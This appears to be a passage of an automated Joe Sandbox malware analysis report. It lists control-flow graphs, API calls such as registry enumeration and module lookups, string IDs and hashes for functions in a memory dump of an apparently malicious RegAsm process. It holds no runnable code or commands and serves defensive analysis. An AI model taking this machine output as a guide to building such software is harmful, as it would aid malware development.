5283->5288 5287->5283 5316 47fc45-47fc4b call 417140 5288->5316 5317 47fb43-47fb4d 5288->5317 5293->5121 5298 47f565-47f58d 5294->5298 5298->5293 5304 47f593-47f5c8 call 4ee300 5298->5304 5321 47f63d 5304->5321 5322 47f5ca-47f638 call 4150c0 call 417140 * 2 call 4f12c0 * 5 5304->5322 5316->5270 5323 47fb5e-47fb88 5317->5323 5321->5298 5322->5162 5323->5316 5327 47fb8e-47fbc3 call 4ee300 5323->5327 5335 47fbc5-47fc3e call 4150c0 call 417140 * 3 call 4f12c0 * 5 5327->5335 5336 47fc40 5327->5336 5335->5162 5336->5323
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: %$&$'$)$3$n{$n{
                                                                                                                                                                                                                                            • API String ID: 3732870572-2532145099
                                                                                                                                                                                                                                            • Opcode ID: 12d5b831637208e6f61387505eb1d172d6ed9de703a99fe20636311636441d61
                                                                                                                                                                                                                                            • Instruction ID: f9e73673bf4fcde7dd34ea82763f24cbe9a1b2c6c573b572f19df27ec8d7527d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12d5b831637208e6f61387505eb1d172d6ed9de703a99fe20636311636441d61
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B130270D052688FCB29DB68CC90BEDBBB5BF49308F1481DAD50EA7252DB346A85CF54
                                                                                                                                                                                                                                            Function 004358A0 Relevance: 16.9, APIs: 2, Strings: 7, Instructions: 1184COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 5371 4358a0-4358c7 5372 435903-435924 5371->5372 5373 4358c9-4358dd call 53e35a 5371->5373 5374 435926-43597d call 4fa560 call 4f4970 5372->5374 5375 43597f-435984 call 4ed870 5372->5375 5373->5372 5382 4358df-435900 call 41f450 call 53e28a call 53e309 5373->5382 5381 435989-4359ab call 41f450 5374->5381 5375->5381 5389 4359e7-435a08 5381->5389 5390 4359ad-4359c1 call 53e35a 5381->5390 5382->5372 5394 435a63-435a68 call 4ed870 5389->5394 5395 435a0a-435a61 call 4fa560 call 4f4970 5389->5395 5390->5389 5401 4359c3-4359e4 call 41f450 call 53e28a call 53e309 5390->5401 5400 435a6d-435a85 5394->5400 5395->5400 5404 435a90-435a94 5400->5404 5401->5389 5407 435a96-435acb 5404->5407 5408 435acd-435b09 5404->5408 5407->5404 5413 435b14-435b18 5408->5413 5415 435b51-435b93 call 436b50 5413->5415 5416 435b1a-435b4f 5413->5416 5422 435b9e-435ba2 5415->5422 5416->5413 5423 435be3-435c30 call 4187e0 5422->5423 5424 435ba4-435be1 5422->5424 5428 435c36-435c46 5423->5428 5424->5422 5428->5428 5429 435c48-435cb2 call 417380 call 414f60 call 414e70 call 414f60 5428->5429 5438 435cb8-435cc8 5429->5438 5438->5438 5439 435cca-435d2a call 417380 call 414f60 call 414e70 call 414f60 call 432db0 5438->5439 5449 435d2f-435d81 call 417140 * 4 call 414fd0 5439->5449 5460 435d83-435d8a 5449->5460 5461 435dc1-435dc9 call 41bb40 5449->5461 5462 435d98 5460->5462 5463 435d8c-435d96 5460->5463 5466 435dce-435dd5 5461->5466 5465 435da2-435dab 5462->5465 5463->5465 5465->5461 5467 435dad-435dbf call 414e70 5465->5467 5468 435de3 5466->5468 5469 435dd7-435de1 5466->5469 5467->5466 5471 435ded-435df6 5468->5471 5469->5471 5472 435e50-435e6e call 417140 5471->5472 5473 435df8-435e12 call 4ee3c0 5471->5473 5480 435e74-435e96 call 435720 5472->5480 5481 435f9f 5472->5481 5479 435e18-435e28 5473->5479 5479->5479 5482 435e2a-435e4b call 4172e0 5479->5482 5489 435ea1-435ea5 5480->5489 5484 435fa9-435fb8 5481->5484 5482->5472 5487 435fba-435fc4 call 417140 5484->5487 5488 435fc9-435fcf 5484->5488 5487->5488 5491 436b22-436b46 call 417140 * 3 5488->5491 5492 435fd5-435fea 5488->5492 5494 435ea7-435ee4 5489->5494 5495 435ee6-435f36 call 41b910 5489->5495 5496 436026-436047 5492->5496 5497 435fec-436000 call 53e35a 5492->5497 5494->5489 5510 435f3c-435f4c 5495->5510 5501 4360a5-4360aa call 4ed870 5496->5501 5502 436049-4360a3 call 4fa560 call 4f4970 5496->5502 5497->5496 5511 436002-436023 call 41f450 call 53e28a call 53e309 5497->5511 5509 4360af-4360fc call 4f39a0 5501->5509 5502->5509 5524 436138-436159 5509->5524 5525 4360fe-436112 call 53e35a 5509->5525 5510->5510 5515 435f4e-435f91 call 41a1e0 call 4f38e0 5510->5515 5511->5496 5515->5481 5541 435f93-435f9d 5515->5541 5531 4361b7-4361bc call 4ed870 5524->5531 5532 43615b-4361b5 call 4fa560 call 4f4970 5524->5532 5525->5524 5540 436114-436135 call 41f450 call 53e28a call 53e309 5525->5540 5539 4361c1-43623c call 4ec9c0 call 4ec980 call 4f27a0 5531->5539 5532->5539 5558 43624a 5539->5558 5559 43623e-436248 5539->5559 5540->5524 5541->5484 5560 436254-43625d 5558->5560 5559->5560 5561 436263-4362a5 call 4357d0 call 4f2850 5560->5561 5562 4369fd-436a3e call 417140 * 4 5560->5562 5572 4362b0-4362b4 5561->5572 5581 436a40-436a54 call 53e35a 5562->5581 5582 436a7a-436a9b 5562->5582 5574 4362b6-4362eb 5572->5574 5575 4362ed-43636a call 4f37b0 call 4f3a70 call 4f2850 call 436bd0 5572->5575 5574->5572 5603 436375-436379 5575->5603 5581->5582 5594 436a56-436a77 call 41f450 call 53e28a call 53e309 5581->5594 5586 436af9-436afe call 4ed870 5582->5586 5587 436a9d-436af7 call 4fa560 call 4f4970 5582->5587 5593 436b03-436b1d call 4f0610 5586->5593 5587->5593 5593->5491 5594->5582 5605 43637b-4363b8 5603->5605 5606 4363ba-436479 call 4f37b0 call 41b910 call 417560 call 506060 call 41b910 call 417560 5603->5606 5605->5603 5623 43647b-4364ec call 566450 * 2 call 41fb00 5606->5623 5624 4364ee-4364fa 5606->5624 5626 436500-436528 call 414d00 call 420e20 5623->5626 5624->5626 5636 436652-43668c call 417140 call 4f2850 call 436c20 5626->5636 5637 43652e-436530 5626->5637 5658 436697-43669b 5636->5658 5638 436532-436544 5637->5638 5639 436549-4365c9 call 566450 * 3 call 566330 call 41fbd0 5637->5639 5641 4365cf-4365ec call 4210e0 5638->5641 5639->5641 5652 436643-43664f call 54e05e 5641->5652 5653 4365ee-4365fa 5641->5653 5652->5636 5654 436600-436610 5653->5654 5654->5654 5659 436612-436640 call 4172e0 call 54e05e 5654->5659 5662 43669d-4366da 5658->5662 5663 4366dc-43679b call 4f37b0 call 41b910 call 417560 call 506060 call 41b910 call 417560 5658->5663 5659->5652 5662->5658 5685 436810-43681c 5663->5685 5686 43679d-43680e call 566450 * 2 call 41fb00 5663->5686 5688 436822-43684a call 414d00 call 420e20 5685->5688 5686->5688 5698 436850-436852 5688->5698 5699 436974-4369f8 call 417140 call 4fa830 call 4f40c0 call 436c70 call 417140 * 5 5688->5699 5701 436854-436866 5698->5701 5702 43686b-4368eb call 566450 * 3 call 566330 call 41fbd0 5698->5702 5699->5562 5705 4368f1-43690e call 4210e0 5701->5705 5702->5705 5714 436910-43691c 5705->5714 5715 436965-436971 call 54e05e 5705->5715 5719 436922-436932 5714->5719 5715->5699 5719->5719 5723 436934-436962 call 4172e0 call 54e05e 5719->5723 5723->5715
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake
                                                                                                                                                                                                                                            • String ID: 2$8$D$N$eks$j3l6lrek$z
                                                                                                                                                                                                                                            • API String ID: 4258034872-2262531636
                                                                                                                                                                                                                                            • Opcode ID: 0ca95265726b17cdf75f3769e54787a7c2374e359b65d6c34f44074c7eed1f70
                                                                                                                                                                                                                                            • Instruction ID: db6f3ab7cd9c42f10531c76a974450e8f1665f2d29a0a6ab9a422aa2031016b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ca95265726b17cdf75f3769e54787a7c2374e359b65d6c34f44074c7eed1f70
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8C267B1D002589FCB24DB64CC91BEEBBB1BF48304F0481EAE50A67381DB786A85CF55
                                                                                                                                                                                                                                            Function 00508D80 Relevance: 16.0, APIs: 10, Instructions: 1016COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 5743 508d80-508daa call 509dc0 5746 508db5-508db9 5743->5746 5747 508dfa-508e42 call 509d50 5746->5747 5748 508dbb-508df8 5746->5748 5752 508e4d-508e51 5747->5752 5748->5746 5753 508e92-508efc GetModuleHandleA call 508650 call 509eb0 5752->5753 5754 508e53-508e90 5752->5754 5760 508f07-508f0b 5753->5760 5754->5752 5761 508f4c-508f94 call 509e40 5760->5761 5762 508f0d-508f4a 5760->5762 5766 508f9f-508fa3 5761->5766 5762->5760 5767 508fe4-50904e GetModuleHandleA call 508650 call 509fd0 5766->5767 5768 508fa5-508fe2 5766->5768 5774 509059-50905d 5767->5774 5768->5766 5775 50909e-5090e6 call 509f60 5774->5775 5776 50905f-50909c 5774->5776 5780 5090f1-5090f5 5775->5780 5776->5774 5781 509136-5091a0 GetModuleHandleA call 508650 call 50a0b0 5780->5781 5782 5090f7-509134 5780->5782 5788 5091ab-5091af 5781->5788 5782->5780 5789 5091f0-509238 call 50a040 5788->5789 5790 5091b1-5091ee 5788->5790 5794 509243-509247 5789->5794 5790->5788 5795 509288-5092f2 GetModuleHandleA call 508650 call 50a1c0 5794->5795 5796 509249-509286 5794->5796 5802 5092fd-509301 5795->5802 5796->5794 5803 509342-50938a call 50a150 5802->5803 5804 509303-509340 5802->5804 5808 509395-509399 5803->5808 5804->5802 5809 5093da-509447 GetModuleHandleA call 508650 call 50a300 5808->5809 5810 50939b-5093d8 5808->5810 5816 509452-509456 5809->5816 5810->5808 5817 5094a0-5094f4 call 50a290 5816->5817 5818 509458-50949e 5816->5818 5822 509505-50950c 5817->5822 5818->5816 5823 50955c-5095d2 GetModuleHandleA call 508650 call 50a410 5822->5823 5824 50950e-50955a 5822->5824 5830 5095e3-5095ea 5823->5830 5824->5822 5831 50963a-50968e call 50a3a0 5830->5831 5832 5095ec-509638 5830->5832 5836 50969f-5096a6 5831->5836 5832->5830 5837 5096f6-50976c GetModuleHandleA call 508650 call 50a540 5836->5837 5838 5096a8-5096f4 5836->5838 5844 50977d-509784 5837->5844 5838->5836 5845 5097d4-509828 call 50a4d0 5844->5845 5846 509786-5097d2 5844->5846 5850 509839-509840 5845->5850 5846->5844 5851 509890-509906 GetModuleHandleA call 508650 call 50a640 5850->5851 5852 509842-50988e 5850->5852 5858 509917-50991e 5851->5858 5852->5850 5859 509920-50996c 5858->5859 5860 50996e-5099c2 call 50a5d0 5858->5860 5859->5858 5864 5099d3-5099da 5860->5864 5865 509a2a-509aa0 GetModuleHandleA call 508650 call 50a6e0 5864->5865 5866 5099dc-509a28 5864->5866 5872 509ab1-509ab8 5865->5872 5866->5864 5873 509b08-509b5c call 50a150 5872->5873 5874 509aba-509b06 5872->5874 5878 509b6d-509b74 5873->5878 5874->5872 5879 509bc4-509c53 GetModuleHandleA call 508650 call 41b910 call 417560 call 508ae0 5878->5879 5880 509b76-509bc2 5878->5880 5890 509d06-509d3e call 417140 * 3 call 4f1460 5879->5890 5891 509c59-509c6a call 508b40 5879->5891 5880->5878 5891->5890 5896 509c70-509c99 call 4150c0 * 2 call 50a780 5891->5896 5896->5890 5909 509c9b-509cea call 4edae0 * 2 call 4ee020 call 508bb0 5896->5909 5909->5890 5918 509cec-509d01 call 508ca0 5909->5918 5918->5890
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?), ref: 00508EB7
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509009
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050915B
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?), ref: 005092AD
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?), ref: 005093FF
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509587
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509721
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?), ref: 005098BB
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509A55
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509BEF
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                                                            • Opcode ID: 61d32dda9e4d37b2856a3451b67d0c373386b42024caf5280836d24abba5e7e9
                                                                                                                                                                                                                                            • Instruction ID: f54d69e34ba9b21312382ec6f9645a4314ff1be99be5a40234549bb951e0b6a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61d32dda9e4d37b2856a3451b67d0c373386b42024caf5280836d24abba5e7e9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98B2F470D052688FDB25CF68CCA0BEEBBB1BF89308F1481D9D549AB346D6316A84DF54
                                                                                                                                                                                                                                            Function 004400A0 Relevance: 14.4, APIs: 3, Strings: 5, Instructions: 393COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 5920 4400a0-4400c0 5921 4400c2-4400d6 call 53e35a 5920->5921 5922 4400fc-440114 5920->5922 5921->5922 5931 4400d8-4400f9 call 41f450 call 53e28a call 53e309 5921->5931 5923 440116-44015e call 4fa560 call 4f4970 5922->5923 5924 440160-440165 call 4ed870 5922->5924 5930 44016a-440185 call 41b910 5923->5930 5924->5930 5938 440188-440198 5930->5938 5931->5922 5938->5938 5940 44019a-4401d9 call 41a1e0 5938->5940 5946 4401e4-4401e8 5940->5946 5947 440215-440252 call 414d00 call 54e93c 5946->5947 5948 4401ea-440213 5946->5948 5954 4405e3-4405f4 call 417140 5947->5954 5955 440258-440487 call 566450 * 2 call 41fb00 call 54edcb call 54e81e call 566450 call 566330 call 566450 * 3 call 566330 call 41fbd0 call 54edcb call 41b910 5947->5955 5948->5946 5986 44048a-44049a 5955->5986 5986->5986 5987 44049c-4404c6 call 41a1e0 5986->5987 5990 4404fd-440505 call 41bb40 5987->5990 5991 4404c8-4404cf 5987->5991 5996 44050a-440511 5990->5996 5993 4404d1-4404d8 5991->5993 5994 4404da 5991->5994 5995 4404e1-4404e7 5993->5995 5994->5995 5995->5990 5997 4404e9-4404fb call 414e70 5995->5997 5998 440513-44051a 5996->5998 5999 44051c 5996->5999 5997->5996 6001 440523-440529 5998->6001 5999->6001 6003 440577-440591 call 417140 6001->6003 6004 44052b-440545 call 4ee3c0 6001->6004 6009 4405a1-4405ad call 41bba0 6003->6009 6010 440593-44059f call 41bb40 6003->6010 6011 440548-440558 6004->6011 6016 4405b2-4405db call 414d00 call 54f2dd call 54ea78 6009->6016 6010->6016 6011->6011 6014 44055a-440572 call 4172e0 6011->6014 6014->6003 6023 4405e0 6016->6023 6023->5954
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 004403C5
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00440439
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 004405CF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExclusiveLock__aulldiv$AcquireRelease$ConditionVariableWake__fread_nolock
                                                                                                                                                                                                                                            • String ID: F4$$eks$j3l6lrek$n{$}{
                                                                                                                                                                                                                                            • API String ID: 577242060-488548467
                                                                                                                                                                                                                                            • Opcode ID: 135eeb2f6a50adef21146f9c479fa0dc5659f26d2ce7ca57f7a424e1ed5e146a
                                                                                                                                                                                                                                            • Instruction ID: 66e22caea41197ff3048d8e9292abdce64640725f2c17728816ecb4b8662871b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 135eeb2f6a50adef21146f9c479fa0dc5659f26d2ce7ca57f7a424e1ed5e146a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6F13C71D002189FDB14DBA4DC85BEEBBB1BF88304F14819AE509A7381DB786E85CF95
                                                                                                                                                                                                                                            Function 00441AF0 Relevance: 13.0, APIs: 4, Strings: 3, Instructions: 789registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 6024 441af0-441b16 6025 441b52-441b6a 6024->6025 6026 441b18-441b2c call 53e35a 6024->6026 6027 441bbc-441bc1 call 4ed870 6025->6027 6028 441b6c-441bba call 4fa560 call 4f4970 6025->6028 6026->6025 6035 441b2e-441b4f call 41f450 call 53e28a call 53e309 6026->6035 6034 441bc6-441bf7 call 41f450 call 414fd0 6027->6034 6028->6034 6046 441c2e-441c36 call 41bb40 6034->6046 6047 441bf9-441c00 6034->6047 6035->6025 6053 441c3b-441c42 6046->6053 6050 441c02-441c09 6047->6050 6051 441c0b 6047->6051 6054 441c12-441c18 6050->6054 6051->6054 6056 441c44-441c4b 6053->6056 6057 441c4d 6053->6057 6054->6046 6055 441c1a-441c2c call 414e70 6054->6055 6055->6053 6059 441c54-441c5a 6056->6059 6057->6059 6061 441cb4-441e94 call 417140 call 566450 call 566330 call 414d00 call 566450 * 2 call 41fb00 RegOpenKeyExA 6059->6061 6062 441c5c-441c76 call 4ee3c0 6059->6062 6082 44266f-442693 call 41b910 6061->6082 6083 441e9a-441ea6 6061->6083 6068 441c7c-441c8c 6062->6068 6068->6068 6070 441c8e-441caf call 4172e0 6068->6070 6070->6061 6089 442699-4426a9 6082->6089 6083->6082 6085 441eac-441ecf call 414fd0 6083->6085 6090 441f06-441f0e call 41bb40 6085->6090 6091 441ed1-441ed8 6085->6091 6089->6089 6092 4426ab-4426e4 call 41a1e0 6089->6092 6099 441f13-441f1a 6090->6099 6093 441ee3 6091->6093 6094 441eda-441ee1 6091->6094 6101 442724-44272c call 41bb40 6092->6101 6102 4426e6-4426ed 6092->6102 6097 441eea-441ef0 6093->6097 6094->6097 6097->6090 6100 441ef2-441f04 call 414e70 6097->6100 6103 441f25 6099->6103 6104 441f1c-441f23 6099->6104 6100->6099 6114 442731-442738 6101->6114 6106 4426ef-4426f9 6102->6106 6107 4426fb 6102->6107 6108 441f2c-441f32 6103->6108 6104->6108 6111 442705-44270e 6106->6111 6107->6111 6112 441f34-441f4e call 4ee3c0 6108->6112 6113 441f8c-441ff3 call 417140 RegEnumKeyExA 6108->6113 6111->6101 6119 442710-442722 call 414e70 6111->6119 6124 441f54-441f64 6112->6124 6131 441ff5 6113->6131 6132 441ffa-44201c call 4427d0 6113->6132 6116 442746 6114->6116 6117 44273a-442744 6114->6117 6121 442750-442759 6116->6121 6117->6121 6119->6114 6125 4427b3-4427ce call 417140 * 2 6121->6125 6126 44275b-442775 call 4ee3c0 6121->6126 6124->6124 6129 441f66-441f87 call 4172e0 6124->6129 6140 44277b-44278b 6126->6140 6129->6113 6136 442431-442455 call 41b910 6131->6136 6145 442027-44202b 6132->6145 6147 44245b-44246b 6136->6147 6140->6140 6144 44278d-4427ae call 4172e0 6140->6144 6144->6125 6149 44206c-4420b6 call 41b910 6145->6149 6150 44202d-44206a 6145->6150 6147->6147 6153 44246d-4424a6 call 41a1e0 6147->6153 6156 4420bc-4420cc 6149->6156 6150->6145 6159 4424e6-4424ee call 41bb40 6153->6159 6160 4424a8-4424af 6153->6160 6156->6156 6158 4420ce-442129 call 41a1e0 call 41b910 6156->6158 6177 44212f-44213f 6158->6177 6167 4424f3-4424fa 6159->6167 6162 4424b1-4424bb 6160->6162 6163 4424bd 6160->6163 6166 4424c7-4424d0 6162->6166 6163->6166 6166->6159 6171 4424d2-4424e4 call 414e70 6166->6171 6168 4424fc-442506 6167->6168 6169 442508 6167->6169 6172 442512-44251b 6168->6172 6169->6172 6171->6167 6175 442575-442594 call 417140 6172->6175 6176 44251d-442537 call 4ee3c0 6172->6176 6186 442596-4425aa call 53e35a 6175->6186 6187 4425d0-4425f1 6175->6187 6185 44253d-44254d 6176->6185 6177->6177 6181 442141-442190 call 41a1e0 call 4f38e0 6177->6181 6202 442196-4421b8 call 442850 6181->6202 6203 442337 6181->6203 6185->6185 6189 44254f-442570 call 4172e0 6185->6189 6186->6187 6201 4425ac-4425cd call 41f450 call 53e28a call 53e309 6186->6201 6190 4425f3-44264a call 4fa560 call 4f4970 6187->6190 6191 44264c-442651 call 4ed870 6187->6191 6189->6175 6200 442656-442669 RegCloseKey 6190->6200 6191->6200 6200->6082 6201->6187 6214 4421c3-4421c7 6202->6214 6206 44233e-44234a 6203->6206 6210 44234c-442356 call 417140 6206->6210 6211 44235b-442361 6206->6211 6210->6211 6216 442372-442378 6211->6216 6217 442363-44236d call 417140 6211->6217 6219 442208-442252 call 41b910 6214->6219 6220 4421c9-442206 6214->6220 6222 442389-44238f 6216->6222 6223 44237a-442384 call 417140 6216->6223 6217->6216 6236 442258-442268 6219->6236 6220->6214 6224 4423a0-4423a6 6222->6224 6225 442391-44239b call 417140 6222->6225 6223->6222 6231 44242c 6224->6231 6232 4423ac-4423d2 call 41b910 6224->6232 6225->6224 6231->6136 6239 4423d8-4423e8 6232->6239 6236->6236 6238 44226a-4422c5 call 41a1e0 call 41b910 6236->6238 6248 4422cb-4422db 6238->6248 6239->6239 6241 4423ea-442427 call 41a1e0 call 4f4620 call 417140 6239->6241 6241->6231 6248->6248 6250 4422dd-44232c call 41a1e0 call 4f38e0 6248->6250 6250->6203 6256 44232e-442335 6250->6256 6256->6206
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00441DB7
                                                                                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,00000000,eks), ref: 00441FE0
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,?,00000000,?,?), ref: 00441E69
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireRelease$ConditionEnumOpenVariableWake__aulldiv
                                                                                                                                                                                                                                            • String ID: eks$j3l6lrek$n{
                                                                                                                                                                                                                                            • API String ID: 2427947366-86532494
                                                                                                                                                                                                                                            • Opcode ID: 5280b538ae035ce425be3f3d58609c05822a39159a016b2c1ee5c212afe72a50
                                                                                                                                                                                                                                            • Instruction ID: 3ce4eab7bc9966ec06563f63b8a7e4ee9434c65e05c46a6efc02796d2f42f37c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5280b538ae035ce425be3f3d58609c05822a39159a016b2c1ee5c212afe72a50
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E824170D002289FDB24CF64C995BEEBBB1BF49304F1481DAE409A7291DB786E89CF55
                                                                                                                                                                                                                                            Function 0042B840 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 6345 42b840-42b850 6346 42b852-42b85e 6345->6346 6347 42b87e-42b880 6345->6347 6348 42b861-42b871 6346->6348 6349 42bb69-42bb6f 6347->6349 6348->6348 6350 42b873-42b87c 6348->6350 6350->6347 6351 42b885-42b89c GetFileAttributesA 6350->6351 6352 42b8a2-42b938 GetLastError call 566450 * 3 call 566330 call 41fbd0 6351->6352 6353 42bb67 6351->6353 6364 42b946-42ba07 call 566450 call 566330 6352->6364 6365 42b93a-42b940 6352->6365 6353->6349 6371 42ba15-42ba9d call 566450 * 2 call 41fb00 6364->6371 6372 42ba09-42ba0f 6364->6372 6365->6364 6366 42bb5d-42bb5f 6365->6366 6366->6349 6379 42baae-42bb4d call 566450 * 3 call 566330 call 41fbd0 6371->6379 6380 42ba9f-42baa8 6371->6380 6372->6366 6372->6371 6391 42bb63-42bb65 6379->6391 6392 42bb4f-42bb5b 6379->6392 6380->6366 6380->6379 6391->6349 6392->6366 6392->6391
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv$AttributesErrorFileLast
